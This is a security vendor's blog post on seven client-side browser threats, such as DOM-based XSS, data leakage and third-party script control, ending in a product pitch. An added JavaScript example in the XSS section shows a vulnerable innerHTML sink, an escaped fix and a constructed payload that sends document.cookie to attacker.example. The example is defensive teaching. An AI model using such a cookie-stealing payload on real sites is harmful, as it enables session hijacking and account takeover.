The Client-Side Seven: Make Sure Your Security Solution Addresses Them All


It is not uncommon for browser-side security to receive limited attention from IT teams when there are so many other types of cyberattack to defend against. Part of the reason is fatigue among security professionals who are battling a constantly growing threat landscape. A bigger part is history: server-side attacks have been more common, and they have been the primary focus of attackers, security officers and web application firewall vendors alike. But application architecture and environments have changed in recent years, and the application’s perimeter is no longer easy to define. Applications are scattered across multiple environments, and they rely on dozens of connections to third-party services that generate much of the content rendered in the browser. Those third-party scripts load straight from the third party’s servers into the user’s browser, so a WAF that only inspects traffic to your own servers never sees them. This is what we call the application supply chain, and more malicious actors are looking to exploit these blind spots and unmonitored areas for their gain.

If client-side protection is not a major part of your organization’s security posture, it is a mistake for which you will eventually pay the price.

Ensure your application protection solution covers you against these seven common client-side threats:

1. Broken Access Control
On the client side, broken access control means JavaScript that should not have access to sensitive data nevertheless gets it: malicious or compromised scripts reading login credentials, payment details or cached application data from the page, or manipulating the DOM (Document Object Model) to reach data held in it. The browser’s same-origin policy offers no protection here, because every script included in the page, first- or third-party, runs with the page’s own origin and can read the same forms, storage and non-HttpOnly cookies. A dedicated client-side protection tool should detect and block both.

2. DOM-based XSS Attacks
A DOM-based XSS (cross-site scripting) vulnerability lets an attacker inject a malicious JavaScript payload into an organization’s web page entirely through its DOM (Document Object Model): page script reads an attacker-controlled value such as the URL fragment (location.hash), the query string or document.referrer and writes it into a dangerous sink such as innerHTML, document.write or eval. The result is script execution in the victim’s session, which can lead to account takeover. Because the payload often travels in the URL fragment, which the browser never sends to the server, these attacks leave no trace in server logs and are invisible to a server-side WAF, which is why you must ensure your client-side protection solution has a way to address them.
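The source-to-sink flow described above, written out as an added example (this is not code from the original article or from Radware). The page, the greeting markup, the attacker host attacker.example and the fragment payload are all constructed for illustration; the render functions return the markup that would be assigned to an HTML sink so the behaviour can be exercised outside a browser, for instance in Node.

```javascript
// Added example (not from the original article): a DOM-based XSS source-to-sink
// flow and its hardened form. The attacker-controlled source is the URL fragment
// (location.hash). The fragment is never sent to the server, so neither server
// logs nor a server-side WAF ever see the payload; only the browser does.
// The render functions return the markup that would be assigned to an HTML sink,
// so the behaviour can be exercised outside a browser (e.g. in Node).

// VULNERABLE: untrusted value flows unescaped into an HTML sink.
// In a page this is: el.innerHTML = renderGreetingUnsafe(location.hash);
function renderGreetingUnsafe(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ''));
  return '<p>Welcome back, ' + name + '</p>';
}

// Minimal HTML entity encoder for text placed inside an element body.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: same rendering, but the untrusted value is HTML-encoded before it
// reaches the sink. In a real page the simpler fix is to avoid the HTML sink
// entirely and assign the value with el.textContent, which never parses markup.
function renderGreetingSafe(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ''));
  return '<p>Welcome back, ' + escapeHtml(name) + '</p>';
}

// Constructed attacker fragment: an <img> whose error handler runs as soon as the
// browser parses the markup and ships any non-HttpOnly cookie to an attacker host.
const ATTACKER_HASH = '#' + encodeURIComponent(
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'
);

// A normal visitor's fragment, to show the safe version still renders plain names.
const BENIGN_HASH = '#' + encodeURIComponent('Alice & Bob');

// Returns the three renderings so they can be inspected or asserted on.
function demo() {
  return {
    unsafe: renderGreetingUnsafe(ATTACKER_HASH), // contains a live <img onerror=...>
    safe: renderGreetingSafe(ATTACKER_HASH),     // markup neutralised as &lt;img ...
    benign: renderGreetingSafe(BENIGN_HASH),     // '<p>Welcome back, Alice &amp; Bob</p>'
  };
}

console.log(demo());
```

The unsafe rendering is what a browser would parse and execute; the safe rendering shows the same payload reduced to inert text. Note that the whole exchange happens in the browser: the request that loaded the page carried nothing after the `#`, which is why server-side inspection cannot catch this class of bug.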

3. Data Leakage
Data leakage is exactly what it sounds like: data leaving the organization for unauthorized destinations and ending up in the hands of malicious actors. On the client side the typical mechanism is a script, often a compromised or malicious third-party script, that reads form fields, cookies or page content and sends them to an attacker-controlled server with a fetch, XMLHttpRequest, beacon or image request. Leaked PII can later be used to access users’ accounts and take control of them, and the consequences range from breaches and identity theft to credential stuffing and ransomware. Your client-side protection solution needs to be able to block data from being sent from the browser side of your applications to unknown destinations, or to known destinations with illegitimate parameters.

4. No 3rd-party Origin Control
Origin control means restricting which origins the page may load resources from and send data to, and comparing every third-party library and outbound request against that allowlist; Content Security Policy (CSP) is the standards-based way to express it. Without proper origin control there is a higher risk of unknown and uncontrolled third-party code accessing data in the application. A client-side protection solution worth its salt needs to automatically discover third-party services, provide detailed activity tracking, and block unvetted origins, so that only the right third-party code has the appropriate access to the application and to the network calls it makes.

5. JavaScript Tracking
Being able to track the JavaScript running in your application is critically important for any interactive website or application, which today means almost all of them. There is an array of things that can go sideways. Developers rely on libraries and third-party tools, and these can be a breeding ground for JavaScript vulnerabilities: many third-party tools are built by smaller, independent developers or companies that do not have the time or resources to monitor and update their code regularly. A third-party script can also change at any time on the vendor’s side, with no change to your own code or deployment. If your client-side protection solution cannot identify code-level changes in the JavaScript used on the client side, you will not know that there is malicious intent until it is too late.

6. Client-Side Data Storage
A lot of sensitive end-user data can be stored on the client side: in localStorage and sessionStorage, in the browser cache, and in transient storage such as JavaScript variables in a data layer. Anything in localStorage or in a global variable is readable by every script running on that origin, including every third-party script the page loads. Your client-side protection solution therefore needs to be advanced enough to protect against data theft and to restrict the type of data that vendors can access and share. This also matters for organizations with data security compliance requirements such as GDPR (General Data Protection Regulation). Client-side browser monitoring ensures that data and content are only exchanged or shared with predetermined domains.

7. No Standard Browser Security Controls
Attackers are opportunists; they look for weak security configurations and poor security controls. Browsers ship standards-based controls such as Content Security Policy, subresource integrity (SRI) and iframe sandboxing, but support varies between browsers and versions, and, more importantly, these controls only do anything when the site actually configures them, which many sites never do. Make sure the client-side protection solution you decide on flags missing controls and can detect and prevent digital trackers and pixels across your web properties.

Client-Side Protection

Today’s applications load on average 20 to 25 third-party scripts per page load. That alone should strike a chord and make clear why client-side protection cannot be pushed to the back burner. It must be part of your overall security posture, and ensuring the Client-Side Seven are covered is as important as every other security measure you have implemented.

If you would like more information about our industry-leading Client-Side Protection Solution, reach out to Radware’s cybersecurity professionals here. We would love to hear from you.

Uri Dorot

Uri Dorot is a senior product marketing manager at Radware, specializing in application protection solutions, service and trends. With a deep understanding of the cyber threat landscape, Uri helps companies bridge the gap between complex cybersecurity concepts and real-world outcomes.
